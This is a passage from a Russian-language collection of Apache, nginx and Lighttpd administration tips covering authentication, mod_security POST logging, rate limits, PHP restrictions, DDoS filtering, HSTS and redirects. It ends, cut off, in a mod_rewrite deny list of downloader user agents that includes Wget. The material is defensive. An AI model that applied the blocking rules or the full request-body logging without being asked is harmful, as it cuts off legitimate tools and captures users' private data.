Особенность в том, что скрипт будет принудительно завершен, только в момент физического вывода данных, т.е. после сброса буфера, например после отправки большого числа данных или вызова функций ob_flush() и flush(). Если вывода данных клиенту не производится или буфер вывода остается несброшенным, то скрипт так и будет выполняться до истечении времени заданного через параметр настройки PHP - max_execution_time. При этом не важно, в какое значение в конфигурации PHP установлен параметр ignore_user_abort.
В качестве обходного пути для прерывания скриптов в течение длительного времени не производящих вывод данных, например, вследствие выполнения длительного SQL запроса, можно использовать расширение pcntl, вызывая функцию pcntl_alarm(таймаут). В отличие от max_execution_time/set_time_limit, определяющих максимальное время утилизации CPU (при выполнении запросов к SQL серверу процессорное время расходуется минимально и скрипт может оставаться висеть днями), функция pcntl_alarm оперирует секундами реального времени.

apache2 + mod_ntlm2 на FreeBSD (доп. ссылка 1) Автор: Comatoz [комментарии]

Прозрачная авторизация пользователя через его доменную учетную запись Использовавшие источники http://www.lissyara.su/?id=1510&commented=1#comment_2138 http://wiki.bestpractical.com/view/NtlmAuthentication В портах появился, но не собирается как надо (на 1.10.07 г.), поэтому cd /usr/ports/www/mod_ntlm2 Необходимо поправить файл mod_ntlm.c make fetch && make extract diff mod_ntlm2-0.1/mod_ntlm.c mod_ntlm2-0.1-fixed/mod_ntlm.c 590c590,596 < apr_pool_sub_make(&sp,p,NULL); --- > /* > * apr_pool_sub_make(&sp,p,NULL); > * > * This function call is not longer available with apache 2.2 > * Try replacing it with apr_pool_create_ex() > */ > apr_pool_create_ex(&sp,p,NULL,NULL); Теперь собираем и устанавливаем make install Пример настройки /usr/local/etc/apache22/Includes/nagios.conf ... ScriptAlias /nagios/cgi-bin/ /usr/local/www/nagios/cgi-bin/ Alias /nagios/ /usr/local/www/nagios/ Alias /nagios /usr/local/www/nagios/ <Location /nagios/cgi-bin> AuthType NTLM NTLMAuth on NTLMAuthoritative on NTLMDomain NAME_DOMAIN # ИМЯ домена NTLMServer dc1 # имя PDC NTLMBackup dc2 # имя BDC Require valid-user </Location> ... Если обращаться из IE - все работает, IE отдает данные авторизации любому. Если обращаться из Mozilla Firefox не будет работать - FF не отдает данные авторизации кому попало, сначала надо определить кому можно отдавать. Для этого в FF(about:config) в параметре network.automatic- ntlm-auth.trusted-uris установить имя сервера которому можно отдавать данные авторизации.

Логгирование POST-запросов в apache (доп. ссылка 1) Автор: mahoro [комментарии]
В некоторые моменты чувствую себя очень неуютно из-за того, что нет возможности посмотреть, что конкретно делают с моим сервером некоторые персоны. Я долго искал возможность логгировать все, в том числе и POST запросы клиентов и нашел способ - через mod_security.
Устанавливается он элементарно apxs -cia mod_security.c (см документацию, правда, для его работы в наиболее удобном, "Concurrent", режиме логгирования, нужен модуль unique_id. После установи модуля следует добавить следующую секцию в httpd.conf:
<IfModule mod_security.c> SecAuditEngine On # У mod_security есть два механизма логгирования, Concurrent - более быстрый и продвинутый. SecAuditLogType Concurrent # Здесь будет храниться индекс - файл, по структуре похожий на access_log + идентификаторы, # по которым можно найти полную информацию в StorageDir SecAuditLog /var/log/www/audit/index # Тут хранятся все данные запросов. Каждый запрос в отдельном файле. # Запросы разнесены по каталогам (вместе все запросы одной транзакции, вместе все транзакции одного дня) SecAuditLogStorageDir /var/log/www/audit/data/ # Наиболее полное логгирование (man) SecAuditLogParts ABCDEFGHZ # Добавить обработку POST данных. SecFilterScanPOST On SecFilterEngine On # Следующие строки нужны для сохранения загруженных на сервер файлов: SecUploadDir /var/log/www/audit/upload SecUploadKeepFiles On </IfModule>

Включать это имеет смысл при подозрении, что кто-то пытается использовать вашу систему не по назначению, теперь любой шаг проходимца будет записан.
p.s. Работоспособность конфига проверялась в apache 1.3.37, mod_security 1.9.4, но работать должно и в 2.0/2.0

Ограничение трафика для виртуального хоста в apache (доп. ссылка 1) [комментарии]
Нижеприведенные настройки ограничат скорость для виртуального хоста в 1024kbps, с возможностью обслуживания не больше 10 запросов в секунду и максимумом в 30 открытых коннектов. Каждый посетитель может установить не больше трех одновременных соединений и получить данные на скорости не выше 20kb/s . Кроме того, виртуальный хост может за 4 недели израсходовать не более 100 Мб трафика, если лимит будет превышен скорость будет ограничена в 128kbps.
<VirtualHost 1.2.3.4> ServerName www.example.com ServerAdmin webmaster@example.com DocumentRoot /var/www CBandLimit 100M CBandExceededSpeed 128 5 15 CBandSpeed 1024 10 30 CBandRemoteSpeed 20kb/s 3 3 CBandScoreboard /var/www/scoreboard CBandPeriod 4W </VirtualHost>

Как совместить использование SuPHP и mod_php в одном apache (доп. ссылка 1) Автор: pookey.co.uk [обсудить]

По умолчанию будет использоваться SuPHP. В httpd.conf: LoadModule suphp_module modules/mod_suphp.so LoadModule php4_module modules/libphp4.so AddType application/x-httpd-php .php AddType application/x-httpd-php-source .phps AddHandler x-httpd-php .php suPHP_Engine on php_admin_flag engine off Для избранных хостов активируем mod_php: <VirtualHost ..> suPHP_Engine off RemoveHandler .php php_admin_flag engine on ... </VirtualHost>

Авторизация в Apache2 из стандартной группы LDAP Автор: Андрей [обсудить]

Авторизация в Apache2 из стандартной группы Ldap (objectClass=posixGroup) В .htaccess прописать параметры модуля mod_auth_ldap AuthType Basic AuthName "For Administrators only!" AuthLDAPURL ldap://ldap.local/dc=local AuthLDAPRemoteUserIsDN off AuthLDAPGroupAttribute memberUid AuthLDAPGroupAttributeIsDN off require group cn=admins_group,ou=group,dc=local Для поддержки протокола ldaps:// необходимо в файле /etc/httpd/conf.d/ldap.conf определить параметры: LDAPTrustedCA /etc/pki/tls/certs/ca.cert LDAPTrustedCAType BASE64_FILE ca.cert это публичный сертификат которым подписан сертификат сервиса ldaps.

Как ограничить в Apache объем данных передаваемых в POST запросе. (доп. ссылка 1) [обсудить]

В .htaccess или в файле конфигурации: LimitRequestBody 50000

Как изменить строку идентифицирующую версию Apache и некоторые модули. [обсудить]

Директива ServerTokens устанавливает формат вывода информации в поле Server: ServerTokens Minimal # Server: Apache/1.3.0 ServerTokens ProductOnly # Server: Apache ServerTokens OS # Server: Apache/1.3.0 (Unix) ServerTokens Full # Server: Apache/1.3.0 (Unix) PHP/3.0

Как ограничить число соединений от одного IP в Apache [обсудить]

Устанавливаем модуль mod_limitipconn и изменяем httpd.conf: ExtendedStatus On <Directory /> ... MaxConnPerIP 10 </Directory>

Как максимально ограничить пользовательские PHP скрипты. [обсудить]

В httpd.conf в блок конфигурации каждого виртуального хоста добавляем: php_admin_flag engine on php_admin_flag expose_php off php_admin_flag safe_mode on php_admin_flag track_vars on php_admin_flag allow_url_fopen off php_admin_flag magic_quotes_runtime on php_admin_value doc_root /home/user/htdocs php_admin_value open_basedir /home/user/htdocs php_admin_value safe_mode_exec_dir /home/user/bin php_admin_value safe_mode_protected_env_vars LD_LIBRARY_PATH php_admin_value safe_mode_allowed_env_vars PHP_ php_admin_value upload_tmp_dir /home/user/htdocs/tmp php_admin_value upload_max_filesize 1024000 php_admin_value max_execution_time 10 php_admin_value post_max_size 1M php_admin_value memory_limit 8M php_admin_flag mysql.allow_persistent off php_admin_value mysql.max_links 5 php_admin_flag pgsql.allow_persistent off php_admin_value pgsql.max_links 5 # в php.ini disable_functions =

Как ограничить размер памяти и CPU для CGI в Apache [обсудить]

Ограничим память в 32 Мб, процессорное время 30 сек., одновременно может быть запущено не более 60 пользовательских CGI скриптов. В <VirtualHost ...>: RLimitMEM 32000000 32000000 RLimitCPU 10 30 RLimitNPROC 60 60

Как преодолеть барьер в 256 одновременных соединений в Apache [обсудить]

Пересоберите apache изменив в httpd.h константу HARD_SERVER_LIMIT с 256 на большее число.

Как ограничить доступ к определенному файлу. [обсудить]

Запретим доступ к .txt файлам: <Files ~ "\.txt"> Order allow,deny Deny from all </Files> Доступа к .cgi и только с IP 1.2.3.4 через пароль, остальным нет доступа. <Files ~ "\.cgi"> Order allow,deny Allow from 123.123.123.123 AuthType Basic AuthName "ENTER PASSWORD" AuthUserFile /home/user/.htpasswd <Limit GET POST PUT> require valid-user </Limit> Deny from all </Files>

Как ограничить доступ к директории только для определенных IP [обсудить]

В .htaccess: order allow,deny allow from 10.0.0.0/24 176.1.2.3 194.67.48.0/24

Как организовать парольный доступ к директории [комментарии]

в .htaccess: AuthType Basic AuthName "Private block" AuthUserFile путь к файлу с паролями require valid-user или require user user1 user2... Создать файл паролей: htpasswd -c .passwd user добавить нового пользователя: htpasswd .passwd user

Как отбить простой DDoS в nginx Автор: Ilya [комментарии]

Все мы сталкивались с зажатым F5 и просто озверевшими ботами, уже давно не секрет, что мораль у данных личностей довольно слаба, а желание забить канал высоко, именно по этому данный сниппет в nginx может срезать львиную долю таких неуравновешенных личностей. Суть идеи в следующем: map "$http_accept_encoding:$remote_addr" $ban_ban { "~*(.*):(1.1.1.1|2.2.2.2)" 0; # тут перечисляем кому "можно" "~*(.*gzip.*|.*identity.*):(.*)" 0; # выделяем запросы с gzip в заголовке Accept-Encoding default 1; # ban } if ($ban_ban = 1) { return 444; } TL;DR: большинство дельцов, не обращают внимание на заголовок gzip в своих запросах, им важно забить серверу исходящий канал (вот и не требуют gzip) - мораль в том, что легитимный пользователь/браузер ВСЕГДА посылает gzip/deflate в своих "ожиданиях" от сервера. Как следствие такое помогает избежать 90% простейших атак.

Оптимизация и тюнинг Apache

Отдача статического web-контента через khttpd в Linux ядре (доп. ссылка 1) Автор: David A. Bandel [комментарии]

Apache, который будет обрабатывать динамический контент, должен принимать соединения на 127.0.0.1:8080. Скрипт для запуска khttpd: #!/bin/sh modprobe khttpd echo 8080 > /proc/sys/net/khttpd/clientport echo /home/httpd/html > /proc/sys/net/khttpd/documentroot echo phtml > /proc/sys/net/khttpd/dynamic echo inc > /proc/sys/net/khttpd/dynamic echo shtml > /proc/sys/net/khttpd/dynamic echo php3 > /proc/sys/net/khttpd/dynamic echo phps > /proc/sys/net/khttpd/dynamic echo php > /proc/sys/net/khttpd/dynamic echo cgi > /proc/sys/net/khttpd/dynamic echo pl > /proc/sys/net/khttpd/dynamic echo 1 > /proc/sys/net/khttpd/logging echo 1 > /proc/sys/net/khttpd/threads echo 80 > /proc/sys/net/khttpd/serverport echo 1 > /proc/sys/net/khttpd/start

Как уменьшить число apache httpd процессов и снизить затраты памяти. (доп. ссылка 1) [комментарии]

- В FreeBSD использование "accept filter" (нет реакции от accept() пока не поступят первые данные запроса): - ядро собираем с "options ACCEPT_FILTER_HTTP" или "options ACCEPT_FILTER_DATA" или kldload accf_http/accf_data или accf_data_load="YES" / accf_http_load="YES в /boot/loader.conf - в конфигурацию Apache добавляем "AcceptFilter on" - Значительное уменьшение величины keepalive, или вообще его запрещение (KeepAlive Off); - Использовать mod_accell или squid в режиме акселератора для кэширования.

Как заставить Apache закачать наиболее часто используемые файлы в память и отдавать клиентам из памяти, а не с диска ? (доп. ссылка 1) [обсудить]

Используйте для статических файлов mod_mmap_static: MMapFile файл1 файл2 ....

Каким web-сервером лучше раздавать большие объемы статического контента. [комментарии]

thttpd - нет keep-alive, при нагрузке достаточно большие задержки между запросом и отдачей. mathoptd - отличная производительность, небольшие запросы к ОЗУ, загрузка CPU примерно на 30% выше чем при аналогичной нагрузке на сервер при использовании thttpd. TUX и khttpd - эксперементальный код, замечательная производительность за счет выноса в linux ядро процедур отдачи статики.

Web сервер перегружен, денег на апгрейд нет, как увеличить производительность с наименьшими потерями ? (доп. ссылка 1) [обсудить]

Если тяжелый апач и много соединений, контент долго генерируется, но может кэшироваться, или наличие большого процента "медленных клиентов" - то значительного прироста производительности можно достигнуть используя mod_accel. Если в CGI скриптах используются SQL запросы: оптимизация базы, оптимизация запросов (EXPLAIN для pgsql), использование индексов, частые vacuum для pgsql и прежде всего кэширование типовых запросов. Если просто запускается много мелких скриптов: mod_perl или fast_cgi. Плюс, вынесение из apache лишних модулей, отдельный web-сервер для раздачи статики и картинок.

Редирект, mod_rewrite

Организация доступа к SSH и HTTPS через один 443 порт при помощи nginx (доп. ссылка 1) [комментарии]

В nginx 1.15.2 в модуль ngx_stream_ssl_preread была добавлена переменная $ssl_preread_protocol, которая определяет наибольшую версию протокола SSL/TLS, которую поддерживает клиент. При помощи новой переменной можно создавать конфигурации для доступа с использованием различных протоколов через один сетевой порт при проксировании трафика с использованием модулей http и stream. В частности, можно разделять обработчики для трафика на базе SSL и не использующего SSL (например, SSH). Для организации доступа по SSH и HTTPS через один сетевой порт 443 можно по умолчанию пробрасывать трафик на SSH, а если определена версия протокола TLSv1.2 пробрасывать на HTTPS: stream { upstream ssh { server 192.0.2.1:22; } upstream web { server 192.0.2.2:443; } map $ssl_preread_protocol $upstream { default ssh; "TLSv1.2" web; } # SSH и SSL на одном порту server { listen 443; proxy_pass $upstream; ssl_preread on; } } По аналогии можно настроить проброс через один сетевой порт для любых других сочетаний SSL/не-SSL протоколов, например, "HTTP/HTTPS", "TCP DNS/DNS over TLS" и т.п.

Перенаправление на HTTPS при помощи HSTS в Apache, NGINX и Lighttpd (доп. ссылка 1) [комментарии]

Протокол HSTS (HTTP Strict Transport Security) позволяет администратору сайта указать на необходимость обращения только по HTTPS и автоматизировать проброс на HTTPS при изначальном обращении по ссылке на HTTP. Управление производится при помощи HTTP-заголовка Strict-Transport-Security, который выдаётся при обращении по HTTPS (при выдаче по HTTP заголовок игнорируется) и указывает браузеру на необходимость оставаться в зоне HTTPS даже при переходе по ссылкам "http://". Замена http:// на https:// будет автоматически выполняться при обращении к защищаемому ресурсу с внешних сайтов, а не только для внутренних ссылок. Использование в Apache: При помощи mod_headers устанавливаем для HTTPS-блока виртуального хоста заголовок Strict-Transport-Security (max-age - срок действия (1 год), includeSubdomains - распространять замену http:// на https:// для всех поддоменов; preload - занести в поддерживаемый браузером статический список). Дополнительно устанавливаем заголовок "X-Frame-Options: DENY" для запрета встраивания контента сайта в блоки iframe. LoadModule headers_module modules/mod_headers.so <VirtualHost 192.168.1.1:443> Header always set Strict-Transport-Security "max-age= 31536000; includeSubdomains; preload" Header always set X-Frame-Options DENY </VirtualHost> Для HTTP-блока хоста настраиваем редирект: <VirtualHost *:80> <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTPS} off RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} </IfModule> </VirtualHost> Настройка в nginx: Добавляем в блок server: add_header Strict-Transport-Security "max-age=63072000; includeSubdomains; preload"; add_header X-Frame-Options "DENY"; Настройка в Lighttpd: server.modules += ( "mod_setenv" ) $HTTP["scheme"] == "https" { setenv.add-response-header = ( "Strict-Transport-Security" => "max-age=63072000; includeSubdomains; preload", "X-Frame-Options" => "DENY") }

Запуск qdPM под управлением nginx через php-fpm (доп. ссылка 1) Автор: viking-coyote [комментарии]

Для использование системы управления проектами qdPM совместно с nginx можно использовать следующие настройки: root /путь/до/qdpm; location / { index index.php; allow <разрешаем коекому>; deny all; } location ~ ^(.+\\.php)(.*)$ { fastcgi_pass unix:/tmp/php-fpm.socket; fastcgi_split_path_info ^(.+\\.php)(.*)$; fastcgi_param SCRIPT_FILENAME $document_root/index.php; fastcgi_param QUERY_STRING $query_string; include fastcgi_params; }

Автоматическое реплицирование статики между несколькими web серверами средствами nginx Автор: Gara [комментарии]

На нескольких серверах время от времени появляется новые файлы, при этом заранее не известно на каком именно сервере появится новый файл. Клиенты в случайном порядке попадают на все серверы. Задача сделать так, чтоб клиенту всегда отдавался новый файл, даже если его нет в момент запроса на сервере. Чтобы клиент не видел 404. rsync не подходит, точнее он может использоваться как дополнение. Предположим дано 3 физических сервера и они отдают одну и туже статику для одного домена stat.domain.com. Серверов может быть больше, решение легко маcштабируется. Введем дополнительные доменные имена для обращения к конкретному серверу: stat.front-01.domain.com stat.front-02.domain.com stat.front-03.domain.com Решение. Решение будем строить на NGINX, используя proxy_pass + proxy_store. Каждый сервер должен иметь 2 конфигурации с одинаковым корнем (root). Первый блок конфигурации - "тупиковый", отвечает только по дополнительному имени stat.front-XX.domain.com и если нет файла отдает 404. Второй блок конфигурации - "проксирующий", обращаются клиенты по имени хоста stat.domain.com, и если файл не найден он будет искать на других серверах. Итого, имеем: # тупиковый server { listen 80; server_name stat.front-01.domain.com; access_log off; location / { root /opt/www/stat.domain.com/; } } # проксирующий # может показаться что это решение, см. дальше. server { listen 80; server_name stat.domain.com; access_log off; location / { root /opt/www/stat.domain.com/; try_files $uri @front-02 @front-03; # кроме front-01 } location @front-02{ internal; proxy_pass http://stat.front-02.domain.com; # забираем из "тупиковой" конфигурации proxy_set_header Host stat.front-02.domain.com; proxy_store on; proxy_store_access user:rw group:rw all:r; proxy_temp_path /opt/www/tmp; root /opt/www/stat.domain.com/; break; } location @front-03{ internal; proxy_pass http://stat.front-03.domain.com; # забираем из "тупиковой" конфигурации proxy_set_header Host stat.front-03.domain.com; proxy_store on; proxy_store_access user:rw group:rw all:r; proxy_temp_path /opt/www/tmp; root /opt/www/stat.domain.com/; break; } } здесь ключевым моментом является try_files $uri @front-02 @front-03; # кроме front-01 Кажется что все ок, и будет работать красиво но вот в чем проблема: try_files в аргументах может иметь кучу файлов и только 1 URL, так что это конфигурация НЕ РАБОТАЕТ.. Посмотрим на директиву proxy_next_upstream. Вот в итоге что получилось: (блок конфигурации универсальный и подходит для всех фронтов) # тупиковый server { listen 80; server_name stat.stat.domain.com; #stat.front-01.domain.com - можно тоже добавить access_log off; location / { root /opt/www/stat.domain.com/; } } # проксирующий upstream stat_backend { # server stat.front-01.domain.com ; # себя комментируем server stat.front-02.domain.com ; server stat.front-03.domain.com ; } server { listen 80; server_name stat.domain.com; access_log off; location / { root /opt/www/stat.domain.com/; try_files $uri @front-stat; } location @front-stat{ internal; proxy_pass http://stat_backend; proxy_next_upstream http_404; proxy_set_header Host stat.stat.domain.com; proxy_store on; proxy_store_access user:rw group:rw all:r; proxy_temp_path /opt/www/tmp; root /opt/www/stat.domain.com; break; } }

Организация в Lighttpd переброса на страницу в зависимости от языка пользователя (доп. ссылка 1) [обсудить]

Для организации редиректа на определенную страницу с учетом выбранного в настройках браузера пользователя языка, в Lighttpd можно использовать модуль mod_magnet, позволяющий определить логику обработки запроса через простой скрипт на языке Lua: lighty.env["uri.path"] = "/en/index.html" lang = lighty.request['Accept-Language'] if (lang) then if (string.sub(lang,1,2) == 'ru') then lighty.env["uri.path"] = "/ru/index.html" end end lighty.env["physical.rel-path"] = lighty.env["uri.path"] lighty.env["physical.path"] = lighty.env["physical.doc-root"] .. lighty.env["physical.rel-path"] Для подключения данного скрипта для обработки запроса стартовой страницы ("/") в файл конфигурации Lighttpd добавляем: $HTTP["url"] =~ "^/$" { magnet.attract-physical-path-to = ( "/path/to/your/script.lua" ) } При обработке запросов mod_magnet кэширует скрипт в предкомпилированном виде и выполняет его в контексте http-сервера, что минимизирует дополнительную нагрузку на сервер. Для Apache гибкую обработку запросов на языке Lua можно реализовать при помощи модуля mod_lua. Но для переброса по языку в Apache можно обойтись обычным mod_rewrite, например так: RewriteCond %{HTTP:Accept-Language} ^ru [NC] RewriteRule ^$ /index_ru.html [L] Или более сложный редирект на скрипт с учетом cookie: # Если выставлена cookie lang, то используем язык из нее: RewriteCond %{HTTP_COOKIE} ^lang=([a-z]{2,3})[-,;]? [OR] # Иначе делаем редирект по первому языку, указанному в заголовке Accept-language RewriteCond %{HTTP:Accept-language} ^([a-z]{2,3})[-,;]? RewriteRule ^$ /index.php?lang=%1 [L]

Редирект в зависимости от домена в nginx (доп. ссылка 1) Автор: Kirill Korinsky [комментарии]

Пример организации редиректа, в зависимости от домена, на какой-то раздел сайта. У нас есть домены, motto.ru, kids.ru, meet.ru и figvam.ru. Есть главный домен forum.ru, на котором мы хотим редиректить их (в зависимости от домена будет разный форум). Наиболее правильный вариант этого: http { map $http_host $forum_id{ hostnames; default ""; .motto.ru "11"; .kids.ru "12"; .meet.ru "13"; .figvam.ru "13"; } server { listen 80 default; rewrite ^ http://forum.ru/?f=$forum_id; } server { listen 80; server_name forum.ru www.forum.ru; location / { proxy_pass http://localhost:80/; } } } содержимое блока map (домен и id форума) можно вынести в отдельный файл и подключать его через include.

Создание SSL прокси при помощи lighttpd Автор: Sergey Shkuratov [комментарии]

Возникла необходимость сделать на lighttpd балансирующий ssl-прокси к веб-серверу под управлением Apache. Другими словами, реализовать схему: https-запрос | \|/ lighttpd / \ / \ apache1 apache2 где apache1. apache2 выбираются, исходя из доступности. Так как задача отняла чуть больше времени и сил, чем ожидалось, приведу решение с небольшим комментарием: Выдержка из /etc/lighttpd/lighttpd.conf: server.modules = ( "mod_redirect", "mod_access", "mod_proxy", "mod_accesslog" ) $SERVER["socket"] == "11.22.33.44:443" { ssl.engine = "enable" ssl.pemfile = "/etc/lighttpd/server.pem" proxy.balance = "fair" proxy.server = ( "" => (( "host" => "10.10.0.15", "port" => 80 ), ( "host" => "10.10.0.115", "port" => 80 ) )) } else $HTTP["host"] == "ssl-site.ru" { url.redirect = ( "^/(.*)" => "https://ssl-site.ru/$1" ) } Как видим, апачи "за сценой" (на 10.10.0.15 и 10.10.0.115) работают на 80-ом порту, а вся https-часть возложена на lighttpd, принимающий запрос на 443-й порт на заданном ip. Ключевым здесь является то, что https-часть определяется как $SERVER["socket"], а не $HTTP["host"], как принято в lighttpd при описании виртуальных хостов. В https, как известно, на одном ip может быть только один ssl-сертификат, что и описывает приведённый кусок конфига. В описании же для http://ssl-site.ru содержится только редирект на https, и более ничего.

Пример привязки к географическому положению посетителя в nginx (доп. ссылка 1) Автор: alexkbs [комментарии]

Для начала, следует прочитать о директивах модуля ngx_http_geo_module: http://sysoev.ru/nginx/docs/http/ngx_http_geo_module.html Во вторую очередь нам нужно получить список сетей в нужном формате. Так как мне нужно отделить только российские IP, у меня делается так: curl -f -o - http://noc.masterhost.ru/allrunet/runet \ http://noc.zenon.net/nets/current | grep -v "0.0.0.0/0" | \ grep -o "[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+\/[0-9]\+" | \ sort | uniq | sed 's/$/ ru;/' > /etc/nginx/rugeo.conf; /etc/init.d/nginx reload Одно из условий - пользователи из любых стран с установленной cookie ALLOWIMAGES не должны подвергаться дискриминации по географическому признаку. Соответственно составляем файл конфигурации nginx. Определяем страну (в контексте http): geo $country { default en; include /etc/nginx/rugeo.conf; } В блоке конфигурации интересующего нас server пишем: location = /spacer.gif { empty_gif; } location ~* \.(jpg|jpeg|gif|png)$ { set $allow_images 1; if ($country = 'en') { set $allow_images 0; } if ($http_cookie ~* ALLOWIMAGES) { set $allow_images 1; } if ($allow_images != 1) { rewrite ^/images/.*$ /spacer.gif break; } expires 7d; root /home/www/htdocs; if (!-f $request_filename) { proxy_pass http://backend; } } Таким образом всем посторонним иностранцам вместо фотографий будет видна пустота, а всем своим фотографии будут видны откуда бы они не заходили. Для ситуаций, когда блокировка обусловлена экономией трафика, http://sergeyx.livejournal.com/ в комментарии советует использовать бесплатную сеть доставки контента CoralCDN (http://www.coralcdn.org): Руководство по настройке: http://wiki.coralcdn.org/wiki.php?n=Main.Servers Например, запросив http://www.test.ru.nyud.net:8080/img/test.gif сеть CoralCDN выступит в роли кэшируюшего прокси для доставки нужного файла. Пример для организации отдачи трафика через CoralCDN для посетителей с некорректным referer: location /i/ { ... # Избегаем зацикливания для запросов от CoralCDN if ($http_user_agent ~ CoralWebPrx) { break; } if ($query_string ~ coral-no-serve) { break; } # Перенаправляем запросы только на существующие файлы if (!-f $request_filename) { break; } # Для посетителей с некорректным referer делаем редирект в CoralCDN # корректность определяем через встроенную переменную nginx $invalid_referer # вместо SITE нужно подставить имя хоста. if ($invalid_referer) { rewrite ^(.+)$ http://SITE.nyud.net$1; } ... } Пример для Apache с mod_rewrite: RewriteEngine on RewriteCond %{HTTP_USER_AGENT} !^CoralWebPrx RewriteCond %{QUERY_STRING} !(^|&)coral-no-serve$ RewriteRule ^/images/foo(.*)$ http://foo.bar.nyud.net:8080/images/foo$1 [R,L] или можно сразу подставить HTTP_HOST RewriteRule ^/images/foo(.*)$ http://%{HTTP_HOST}.nyud.net:8080/images/foo$1 [R,L]

Замена содержимого отдаваемых Apache2 документов, по заданной маске (доп. ссылка 1) [комментарии]

Для автоматической замены, при отдаче html страниц, одного блока на другой можно использовать mod_substitute (http://httpd.apache.org/docs/2.2/mod/mod_substitute.html). Маска замены задается в виде регулярного выражения. Примеры: <Location /private> AddOutputFilterByType SUBSTITUTE text/html Substitute s/SECRET/XXXXX/ni </Location> <Location /> AddOutputFilterByType SUBSTITUTE text/html Substitute s/foo/bar/ni </Location> <Location /> AddOutputFilterByType SUBSTITUTE text/html Substitute "s|<BR */?>|<br />|i" </Location> Опции: i - совпадение без учета регистра; n - строчное совпадение, без использования регулярных выражений; f - позволяет результаты текущей замены использовать в других заменах, заданных в других mod_substitute правилах.

Блокирование автоматических качалок через mod_rewrite (доп. ссылка 1) [комментарии]

RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR] RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.* - 